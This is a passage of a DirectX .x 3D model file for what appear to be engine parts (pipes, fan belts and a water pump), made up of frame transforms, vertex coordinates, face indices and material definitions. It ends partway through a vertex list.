0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.329412;0.329412;0.329412;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _pipes2 Frame _fanbelts { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh fanbelts { 112; -1.324744;-0.004516;-1.669944;, -1.306698;-0.007623;-1.669944;, -1.306693;-0.007623;-1.614422;, -1.324740;-0.004516;-1.614420;, -1.316262;0.046810;-1.669944;, -1.298730;0.040599;-1.669945;, -1.298725;0.040599;-1.614423;, -1.316257;0.046810;-1.614422;, -1.291013;0.093838;-1.669945;, -1.276445;0.082104;-1.669946;, -1.276440;0.082104;-1.614424;, -1.291007;0.093838;-1.614423;, -1.252044;0.129816;-1.669948;, -1.242054;0.113856;-1.669949;, -1.242050;0.113856;-1.614427;, -1.252040;0.129816;-1.614425;, -1.203671;0.150764;-1.669950;, -1.199360;0.132346;-1.669950;, -1.199355;0.132346;-1.614429;, -1.203663;0.150764;-1.614428;, -1.153317;0.154227;-1.669954;, -1.151058;0.135667;-1.669954;, -1.151052;0.135667;-1.614431;, -1.153311;0.154227;-1.614431;, -0.497602;0.324570;-1.669995;, -0.497386;0.311053;-1.669995;, -0.497382;0.311053;-1.614473;, -0.497598;0.324570;-1.614473;, -0.434153;0.314971;-1.670000;, -0.438171;0.302095;-1.669999;, -0.438169;0.302095;-1.614476;, -0.434147;0.314971;-1.614476;, -0.376968;0.285348;-1.670004;, -0.384782;0.274436;-1.670004;, -0.384779;0.274436;-1.614480;, -0.376966;0.285348;-1.614482;, -0.331938;0.238757;-1.670008;, -0.342738;0.230936;-1.670006;, -0.342733;0.230936;-1.614484;, -0.331934;0.238757;-1.614484;, -0.303704;0.180003;-1.670010;, -0.316375;0.176077;-1.670008;, -0.316372;0.176077;-1.614486;, -0.303699;0.180003;-1.614487;, -0.295241;0.115659;-1.670011;, -0.308352;0.115075;-1.670010;, -0.308348;0.115075;-1.614487;, -0.295235;0.115659;-1.614488;, -0.328615;-0.396299;-1.670008;, -0.339653;-0.396435;-1.670006;, -0.339650;-0.396435;-1.614484;, -0.328610;-0.396299;-1.614484;, -0.331780;-0.455199;-1.670008;, -0.342890;-0.454038;-1.670006;, -0.342886;-0.454038;-1.614484;, -0.331779;-0.455199;-1.614484;, -0.337188;-0.513915;-1.670008;, -0.347498;-0.508773;-1.670006;, -0.347495;-0.508773;-1.614484;, -0.337186;-0.513915;-1.614484;, -0.363009;-0.565639;-1.670005;, -0.371568;-0.556987;-1.670004;, -0.371564;-0.556987;-1.614482;, -0.363008;-0.565639;-1.614482;, -0.400470;-0.605596;-1.670001;, -0.406487;-0.594236;-1.670001;, -0.406483;-0.594236;-1.614478;, -0.400465;-0.605596;-1.614480;, -0.446219;-0.630163;-1.669997;, -0.448932;-0.617027;-1.669997;, -0.448928;-0.617027;-1.614476;, -0.446214;-0.630163;-1.614476;, -0.495115;-0.634447;-1.669995;, -0.495698;-0.621125;-1.669995;, -0.495691;-0.621125;-1.614473;, -0.495111;-0.634447;-1.614473;, -0.515332;-0.635257;-1.669992;, -0.514157;-0.621865;-1.669994;, -0.514153;-0.621865;-1.614470;, -0.515328;-0.635257;-1.614470;, -0.541886;-0.627224;-1.669991;, -0.538656;-0.614452;-1.669991;, -0.538652;-0.614452;-1.614469;, -0.541882;-0.627224;-1.614469;, -0.566405;-0.616435;-1.669988;, -0.560936;-0.604649;-1.669990;, -0.560932;-0.604649;-1.614466;, -0.566402;-0.616435;-1.614466;, -0.599499;-0.584397;-1.669986;, -0.591660;-0.574906;-1.669986;, -0.591655;-0.574906;-1.614465;, -0.599495;-0.584397;-1.614464;, -1.280129;-0.123940;-1.669946;, -1.264950;-0.113408;-1.669948;, -1.264945;-0.113408;-1.614424;, -1.280124;-0.123940;-1.614424;, -1.289798;-0.106674;-1.669945;, -1.274474;-0.096400;-1.669946;, -1.274469;-0.096400;-1.614424;, -1.289792;-0.106674;-1.614423;, -1.304447;-0.086743;-1.669944;, -1.288611;-0.077166;-1.669945;, -1.288606;-0.077166;-1.614423;, -1.304442;-0.086743;-1.614422;, -1.317431;-0.057597;-1.669944;, -1.299619;-0.052458;-1.669945;, -1.299613;-0.052458;-1.614423;, -1.317426;-0.057597;-1.614422;, -1.320002;-0.036603;-1.669944;, -1.301844;-0.034286;-1.669945;, -1.301839;-0.034286;-1.614422;, -1.319997;-0.036603;-1.614420;; 112; 4;44,40,43,47;, 4;48,44,47,51;, 4;52,48,51,55;, 4;56,52,55,59;, 4;60,56,59,63;, 4;64,60,63,67;, 4;68,64,67,71;, 4;72,68,71,75;, 4;76,72,75,79;, 4;80,76,79,83;, 4;84,80,83,87;, 4;88,84,87,91;, 4;92,88,91,95;, 4;96,92,95,99;, 4;100,96,99,103;, 4;104,100,103,107;, 4;108,104,107,111;, 4;108,111,3,0;, 4;4,0,3,7;, 4;8,4,7,11;, 4;12,8,11,15;, 4;16,12,15,19;, 4;20,16,19,23;, 4;24,20,23,27;, 4;28,24,27,31;, 4;32,28,31,35;, 4;36,32,35,39;, 4;40,36,39,43;, 4;47,43,42,46;, 4;51,47,46,50;, 4;55,51,50,54;, 4;59,55,54,58;, 4;63,59,58,62;, 4;67,63,62,66;, 4;71,67,66,70;, 4;75,71,70,74;, 4;79,75,74,78;, 4;83,79,78,82;, 4;87,83,82,86;, 4;91,87,86,90;, 4;95,91,90,94;, 4;99,95,94,98;, 4;103,99,98,102;, 4;107,103,102,106;, 4;111,107,106,110;, 4;111,110,2,3;, 4;7,3,2,6;, 4;11,7,6,10;, 4;15,11,10,14;, 4;19,15,14,18;, 4;23,19,18,22;, 4;27,23,22,26;, 4;31,27,26,30;, 4;35,31,30,34;, 4;39,35,34,38;, 4;43,39,38,42;, 4;45,41,40,44;, 4;49,45,44,48;, 4;53,49,48,52;, 4;57,53,52,56;, 4;61,57,56,60;, 4;65,61,60,64;, 4;69,65,64,68;, 4;73,69,68,72;, 4;77,73,72,76;, 4;81,77,76,80;, 4;85,81,80,84;, 4;89,85,84,88;, 4;93,89,88,92;, 4;97,93,92,96;, 4;101,97,96,100;, 4;105,101,100,104;, 4;109,105,104,108;, 4;109,108,0,1;, 4;5,1,0,4;, 4;9,5,4,8;, 4;13,9,8,12;, 4;17,13,12,16;, 4;21,17,16,20;, 4;25,21,20,24;, 4;29,25,24,28;, 4;33,29,28,32;, 4;37,33,32,36;, 4;41,37,36,40;, 4;46,42,41,45;, 4;50,46,45,49;, 4;54,50,49,53;, 4;58,54,53,57;, 4;62,58,57,61;, 4;66,62,61,65;, 4;70,66,65,69;, 4;74,70,69,73;, 4;78,74,73,77;, 4;82,78,77,81;, 4;86,82,81,85;, 4;90,86,85,89;, 4;94,90,89,93;, 4;98,94,93,97;, 4;102,98,97,101;, 4;106,102,101,105;, 4;110,106,105,109;, 4;110,109,1,2;, 4;6,2,1,5;, 4;10,6,5,9;, 4;14,10,9,13;, 4;18,14,13,17;, 4;22,18,17,21;, 4;26,22,21,25;, 4;30,26,25,29;, 4;34,30,29,33;, 4;38,34,33,37;, 4;42,38,37,41;; MeshMaterialList { 1; 112; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.000000;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _fanbelts Frame _wpump { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh wpump { 599; -0.733088;0.170751;-1.289724;, -0.750947;0.141744;-1.289724;, -0.774652;0.177415;-1.287033;, -0.776709;0.124624;-1.289723;, -0.810369;0.119395;-1.289722;, -0.800414;0.160296;-1.287032;, -0.851925;0.126058;-1.289721;, -0.880606;0.141283;-1.289720;, -0.841971;0.166958;-1.287031;, -0.896413;0.165069;-1.289720;, -0.899342;0.197408;-1.289720;, -0.857779;0.190744;-1.287031;, -0.889389;0.238303;-1.289720;, -0.871531;0.267309;-1.289721;, -0.847826;0.231638;-1.287031;, -0.845767;0.284430;-1.289721;, -0.812109;0.289659;-1.289722;, -0.822062;0.248759;-1.287032;, -0.770550;0.282995;-1.289723;, -0.741868;0.267770;-1.289724;, -0.780505;0.242095;-1.287033;, -0.726062;0.243985;-1.289724;, -0.723135;0.211645;-1.289724;, -0.764699;0.218309;-1.287033;, -0.186313;-0.323503;-1.330924;, -0.215964;-0.308923;-1.330922;, -0.174057;-0.281073;-1.328234;, -0.231771;-0.285138;-1.330922;, -0.233729;-0.252153;-1.330922;, -0.189863;-0.257287;-1.328234;, -0.221836;-0.209969;-1.330922;, -0.201675;-0.179433;-1.330923;, -0.177969;-0.215105;-1.328234;, -0.173249;-0.160542;-1.330924;, -0.137289;-0.153783;-1.330924;, -0.149544;-0.196213;-1.328235;, -0.093790;-0.159158;-1.330926;, -0.064139;-0.173738;-1.330926;, -0.106046;-0.201587;-1.328236;, -0.048332;-0.197524;-1.330927;, -0.046375;-0.230508;-1.330928;, -0.090240;-0.225373;-1.328236;, -0.058269;-0.272691;-1.330927;, -0.078428;-0.303227;-1.330927;, -0.102134;-0.267555;-1.328236;, -0.106854;-0.322118;-1.330926;, -0.142816;-0.328877;-1.330925;, -0.130560;-0.286447;-1.328235;, -0.845767;0.284430;-1.306935;, -0.812109;0.289659;-1.306936;, -0.812109;0.289659;-1.295101;, -0.845767;0.284430;-1.295101;, -0.770551;0.282995;-1.306937;, -0.741869;0.267770;-1.306938;, -0.741869;0.267770;-1.295103;, -0.770550;0.282995;-1.295102;, -0.726062;0.243985;-1.306939;, -0.723136;0.211645;-1.306939;, -0.723135;0.211645;-1.295104;, -0.726062;0.243985;-1.295104;, -0.733088;0.170751;-1.306938;, -0.750947;0.141744;-1.306938;, -0.750947;0.141744;-1.295103;, -0.733088;0.170751;-1.295104;, -0.776709;0.124624;-1.306937;, -0.810369;0.119395;-1.306936;, -0.810369;0.119395;-1.295102;, -0.776709;0.124624;-1.295102;, -0.851926;0.126058;-1.306935;, -0.880606;0.141283;-1.306934;, -0.880606;0.141283;-1.295100;, -0.851925;0.126058;-1.295100;, -0.896414;0.165069;-1.306934;, -0.899342;0.197408;-1.306934;, -0.899342;0.197408;-1.295099;, -0.896413;0.165069;-1.295099;, -0.889389;0.238303;-1.306934;, -0.871531;0.267309;-1.306935;, -0.871531;0.267309;-1.295100;, -0.889389;0.238303;-1.295099;, -0.048333;-0.197524;-1.348141;, -0.046375;-0.230508;-1.348142;, -0.046375;-0.230508;-1.336306;, -0.048332;-0.197524;-1.336306;, -0.058270;-0.272691;-1.348142;, -0.078428;-0.303227;-1.348141;, -0.078428;-0.303227;-1.336306;, -0.058269;-0.272691;-1.336306;, -0.106855;-0.322118;-1.348140;, -0.142817;-0.328877;-1.348139;, -0.142816;-0.328877;-1.336304;, -0.106854;-0.322118;-1.336305;, -0.186313;-0.323503;-1.348138;, -0.215964;-0.308923;-1.348137;, -0.215964;-0.308923;-1.336302;, -0.186313;-0.323503;-1.336303;, -0.231771;-0.285138;-1.348136;, -0.233729;-0.252153;-1.348136;, -0.233729;-0.252153;-1.336302;, -0.231771;-0.285138;-1.336302;, -0.221836;-0.209969;-1.348136;, -0.201676;-0.179433;-1.348137;, -0.201675;-0.179433;-1.336302;, -0.221836;-0.209969;-1.336302;, -0.173249;-0.160542;-1.348138;, -0.137289;-0.153783;-1.348139;, -0.137289;-0.153783;-1.336304;, -0.173249;-0.160542;-1.336303;, -0.093791;-0.159158;-1.348140;, -0.064139;-0.173738;-1.348140;, -0.064139;-0.173738;-1.336306;, -0.093790;-0.159158;-1.336305;, -0.851927;0.126058;-1.337062;, -0.880608;0.141283;-1.337061;, -0.880608;0.141283;-1.325225;, -0.851926;0.126058;-1.325226;, -0.896415;0.165069;-1.337061;, -0.899342;0.197408;-1.337061;, -0.899342;0.197408;-1.325225;, -0.896414;0.165069;-1.325225;, -0.889390;0.238303;-1.337061;, -0.871531;0.267309;-1.337059;, -0.871531;0.267309;-1.325226;, -0.889390;0.238303;-1.325225;, -0.845768;0.284430;-1.337060;, -0.812109;0.289659;-1.337063;, -0.812109;0.289659;-1.325227;, -0.845768;0.284430;-1.325226;, -0.770552;0.282995;-1.337064;, -0.741870;0.267770;-1.337065;, -0.741870;0.267770;-1.325229;, -0.770551;0.282995;-1.325228;, -0.726063;0.243985;-1.337065;, -0.723137;0.211645;-1.337065;, -0.723136;0.211645;-1.325229;, -0.726063;0.243985;-1.325229;, -0.733089;0.170751;-1.337065;, -0.750947;0.141744;-1.337064;, -0.750947;0.141744;-1.325229;, -0.733089;0.170751;-1.325229;, -0.776710;0.124624;-1.337064;, -0.810369;0.119395;-1.337063;, -0.810369;0.119395;-1.325227;, -0.776710;0.124624;-1.325228;, -0.221837;-0.209969;-1.378262;, -0.201676;-0.179433;-1.378262;, -0.201676;-0.179433;-1.366428;, -0.221837;-0.209969;-1.366428;, -0.173250;-0.160542;-1.378263;, -0.137290;-0.153783;-1.378264;, -0.137290;-0.153783;-1.366430;, -0.173250;-0.160542;-1.366429;, -0.093791;-0.159158;-1.378265;, -0.064139;-0.173738;-1.378266;, -0.064139;-0.173738;-1.366432;, -0.093791;-0.159158;-1.366431;, -0.048335;-0.197522;-1.378267;, -0.046376;-0.230508;-1.378267;, -0.046375;-0.230508;-1.366433;, -0.048333;-0.197524;-1.366433;, -0.058270;-0.272691;-1.378266;, -0.078429;-0.303227;-1.378266;, -0.078429;-0.303227;-1.366432;, -0.058270;-0.272691;-1.366432;, -0.106855;-0.322118;-1.378265;, -0.142817;-0.328877;-1.378264;, -0.142817;-0.328877;-1.366430;, -0.106855;-0.322118;-1.366431;, -0.186315;-0.323503;-1.378263;, -0.215965;-0.308923;-1.378262;, -0.215965;-0.308923;-1.366428;, -0.186315;-0.323503;-1.366429;, -0.231772;-0.285138;-1.378262;, -0.233730;-0.252153;-1.378262;, -0.233729;-0.252153;-1.366428;, -0.231771;-0.285138;-1.366428;, -0.729755;0.241531;-1.347823;, -0.727109;0.212282;-1.347823;, -0.723137;0.211645;-1.342444;, -0.726063;0.243985;-1.342443;, -0.737062;0.171389;-1.347823;, -0.753213;0.145153;-1.347822;, -0.750947;0.141744;-1.342443;, -0.733089;0.170751;-1.342443;, -0.778976;0.128033;-1.347821;, -0.809419;0.123304;-1.347821;, -0.810369;0.119395;-1.342441;, -0.776710;0.124624;-1.342442;, -0.850976;0.129967;-1.347820;, -0.876916;0.143737;-1.347819;, -0.880608;0.141283;-1.342440;, -0.851927;0.126058;-1.342440;, -0.892724;0.167521;-1.347819;, -0.895371;0.196772;-1.347819;, -0.899343;0.197408;-1.342439;, -0.896415;0.165069;-1.342439;, -0.885417;0.237665;-1.347819;, -0.869267;0.263900;-1.347819;, -0.871531;0.267309;-1.342440;, -0.889390;0.238303;-1.342439;, -0.843504;0.281021;-1.347820;, -0.813060;0.285749;-1.347821;, -0.812109;0.289659;-1.342441;, -0.845768;0.284430;-1.342440;, -0.771503;0.279087;-1.347822;, -0.745564;0.265317;-1.347822;, -0.741870;0.267770;-1.342443;, -0.770552;0.282995;-1.342442;, -0.109121;-0.318709;-1.389025;, -0.141646;-0.324821;-1.389023;, -0.142817;-0.328877;-1.383644;, -0.106855;-0.322118;-1.383645;, -0.185143;-0.319447;-1.389022;, -0.211961;-0.306261;-1.389021;, -0.215965;-0.308923;-1.383642;, -0.186315;-0.323502;-1.383643;, -0.227768;-0.282477;-1.389021;, -0.229537;-0.252643;-1.389021;, -0.233730;-0.252153;-1.383642;, -0.231772;-0.285138;-1.383642;, -0.217643;-0.210461;-1.389021;, -0.199411;-0.182841;-1.389021;, -0.201676;-0.179433;-1.383643;, -0.221837;-0.209969;-1.383642;, -0.170985;-0.163951;-1.389022;, -0.138459;-0.157839;-1.389023;, -0.137290;-0.153783;-1.383644;, -0.173250;-0.160542;-1.383643;, -0.094964;-0.163213;-1.389024;, -0.068145;-0.176399;-1.389025;, -0.064139;-0.173738;-1.383646;, -0.093791;-0.159158;-1.383646;, -0.052339;-0.200185;-1.389025;, -0.050569;-0.230017;-1.389025;, -0.046376;-0.230507;-1.383647;, -0.048335;-0.197522;-1.383647;, -0.062462;-0.272199;-1.389025;, -0.080697;-0.299819;-1.389026;, -0.078430;-0.303227;-1.383646;, -0.058270;-0.272691;-1.383647;, -0.882505;0.198770;-1.373317;, -0.886476;0.199405;-1.353198;, -0.883828;0.170156;-1.353198;, -0.879576;0.171764;-1.375288;, -0.878426;0.232484;-1.353198;, -0.874454;0.231847;-1.373317;, -0.860009;0.255310;-1.374717;, -0.862273;0.258720;-1.353198;, -0.875005;0.187481;-1.449715;, -0.882506;0.198770;-1.405375;, -0.879576;0.171764;-1.407346;, -0.872797;0.161564;-1.444277;, -0.874454;0.231847;-1.410975;, -0.866954;0.220559;-1.455314;, -0.851574;0.242614;-1.460796;, -0.860010;0.255310;-1.412372;, -0.841229;0.136653;-1.533541;, -0.861876;0.167722;-1.498173;, -0.859668;0.141804;-1.492735;, -0.845976;0.121199;-1.514583;, -0.850081;0.195167;-1.514503;, -0.829436;0.164098;-1.549871;, -0.807378;0.176238;-1.560818;, -0.834702;0.217221;-1.519985;, -0.576905;-0.122999;-1.555534;, -0.634326;-0.094090;-1.555532;, -0.642133;-0.105064;-1.520888;, -0.580204;-0.136122;-1.520889;, -0.622317;-0.069858;-1.578626;, -0.564898;-0.098768;-1.578628;, -0.559040;-0.015381;-1.590720;, -0.695860;-0.055144;-1.555530;, -0.744996;-0.007310;-1.555529;, -0.756381;-0.013623;-1.520885;, -0.703670;-0.066118;-1.520886;, -0.725766;0.012351;-1.578623;, -0.676632;-0.035482;-1.578625;, -0.613354;0.018994;-1.590718;, -0.710754;0.027886;-1.591626;, -0.786141;0.054608;-1.555528;, -0.819459;0.103893;-1.547070;, -0.824206;0.088439;-1.528115;, -0.797528;0.048296;-1.520884;, -0.798627;0.117736;-1.570166;, -0.765310;0.068452;-1.578622;, -0.750298;0.083986;-1.591624;, -0.776569;0.129877;-1.581113;, -0.498220;0.236907;-1.555536;, -0.442260;0.234913;-1.555537;, -0.437573;0.247520;-1.520893;, -0.500757;0.250161;-1.520891;, -0.443442;0.206656;-1.578631;, -0.499402;0.208650;-1.578629;, -0.500916;0.123950;-1.590721;, -0.379933;0.211743;-1.555539;, -0.335674;0.175808;-1.555540;, -0.325681;0.185072;-1.520896;, -0.375247;0.224348;-1.520895;, -0.353240;0.153642;-1.578633;, -0.397500;0.189576;-1.578632;, -0.454972;0.106870;-1.590723;, -0.349063;0.098305;-1.590180;, -0.138326;-0.169751;-1.410831;, -0.136645;-0.166461;-1.394404;, -0.169172;-0.172574;-1.394403;, -0.166905;-0.175983;-1.408819;, -0.101462;-0.170808;-1.394405;, -0.103142;-0.174098;-1.410832;, -0.079157;-0.185891;-1.409578;, -0.074645;-0.183995;-1.394405;, -0.141475;-0.165014;-1.452711;, -0.138326;-0.169751;-1.434286;, -0.166906;-0.175983;-1.432274;, -0.167960;-0.174399;-1.445903;, -0.105176;-0.171040;-1.442331;, -0.108325;-0.166303;-1.460757;, -0.086212;-0.175279;-1.467669;, -0.081192;-0.182834;-1.441077;, -0.150239;-0.151826;-1.462179;, -0.143581;-0.161846;-1.456515;, -0.170066;-0.171230;-1.449707;, -0.174037;-0.165256;-1.451608;, -0.116780;-0.153577;-1.475702;, -0.123439;-0.143559;-1.481366;, -0.107719;-0.142916;-1.501082;, -0.094668;-0.162552;-1.482613;, -0.175514;-0.113790;-1.463155;, -0.156075;-0.143044;-1.462178;, -0.179872;-0.156473;-1.451608;, -0.202188;-0.131516;-1.451607;, -0.133675;-0.128158;-1.485273;, -0.153115;-0.098905;-1.486249;, -0.141914;-0.091460;-1.509347;, -0.117953;-0.127515;-1.504988;, -0.200222;-0.019917;-1.482399;, -0.207385;0.007060;-1.497798;, -0.172760;-0.045043;-1.509347;, -0.183961;-0.052487;-1.486248;, -0.213934;0.000719;-1.459306;, -0.221097;0.027696;-1.474704;, -0.222623;-0.034805;-1.459305;, -0.206362;-0.067373;-1.463154;, -0.233033;-0.085099;-1.451606;, -0.619441;0.192804;-1.556624;, -0.562263;0.219019;-1.555534;, -0.564800;0.232272;-1.520890;, -0.622129;0.206511;-1.520888;, -0.550923;0.194258;-1.578628;, -0.608101;0.168045;-1.579719;, -0.552437;0.109559;-1.590720;, -0.711803;0.168016;-1.548164;, -0.666889;0.161271;-1.556623;, -0.669580;0.174978;-1.520887;, -0.699197;0.171512;-1.528118;, -0.673798;0.127001;-1.584082;, -0.718709;0.133743;-1.575624;, -0.741807;0.123297;-1.585480;, -0.715532;0.077407;-1.595991;, -0.618134;0.068515;-1.595084;, -0.757699;0.236952;-1.498176;, -0.733573;0.200776;-1.534636;, -0.720968;0.204272;-1.514586;, -0.734660;0.224878;-1.492738;, -0.763444;0.200532;-1.550964;, -0.787572;0.236707;-1.514505;, -0.813861;0.231070;-1.519985;, -0.786541;0.190086;-1.560819;, -0.811944;0.273389;-1.373319;, -0.810990;0.277296;-1.353200;, -0.841434;0.272568;-1.353198;, -0.839170;0.269159;-1.374717;, -0.777378;0.271908;-1.353201;, -0.778329;0.267998;-1.373319;, -0.754566;0.254838;-1.375291;, -0.751436;0.258137;-1.353202;, -0.778330;0.267998;-1.405378;, -0.770829;0.256710;-1.449717;, -0.747790;0.244637;-1.444281;, -0.754567;0.254838;-1.407349;, -0.804445;0.262100;-1.455315;, -0.811945;0.273389;-1.410976;, -0.839171;0.269159;-1.412373;, -0.830735;0.256462;-1.460797;, -0.714225;0.145308;-1.459292;, -0.745650;0.128428;-1.451593;, -0.725925;0.143945;-1.462207;, -0.677577;0.169661;-1.459293;, -0.653762;0.185487;-1.474692;, -0.669579;0.174978;-1.497786;, -0.693394;0.159151;-1.482386;, -0.705093;0.157789;-1.485303;, -0.699197;0.171512;-1.505016;, -0.736917;0.160486;-1.453307;, -0.729618;0.149500;-1.462207;, -0.749342;0.133985;-1.451593;, -0.754010;0.141008;-1.446496;, -0.713223;0.170024;-1.481567;, -0.720523;0.181010;-1.472667;, -0.721018;0.204351;-1.479433;, -0.707327;0.183747;-1.501282;, -0.739414;0.209440;-1.376691;, -0.736003;0.209647;-1.353202;, -0.738651;0.238897;-1.353202;, -0.741781;0.235598;-1.375291;, -0.744054;0.176570;-1.353202;, -0.747464;0.176361;-1.376691;, -0.762471;0.153743;-1.374719;, -0.760205;0.150335;-1.353201;, -0.747466;0.176361;-1.414348;, -0.742558;0.168977;-1.443112;, -0.759653;0.149498;-1.436302;, -0.762474;0.153743;-1.412377;, -0.732261;0.198674;-1.450997;, -0.737167;0.206058;-1.422231;, -0.739534;0.232216;-1.420832;, -0.732758;0.222015;-1.457764;, -0.805213;0.074926;-1.482383;, -0.797527;0.048296;-1.497782;, -0.824205;0.088439;-1.505013;, -0.809268;0.088559;-1.485300;, -0.791497;0.054288;-1.459290;, -0.783813;0.027658;-1.474689;, -0.784379;0.088769;-1.459291;, -0.788436;0.102404;-1.462206;, -0.766490;0.114581;-1.451592;, -0.824698;0.111780;-1.472664;, -0.817400;0.100793;-1.481564;, -0.832335;0.100674;-1.501278;, -0.846027;0.121277;-1.479430;, -0.792128;0.107959;-1.462205;, -0.799428;0.118945;-1.453306;, 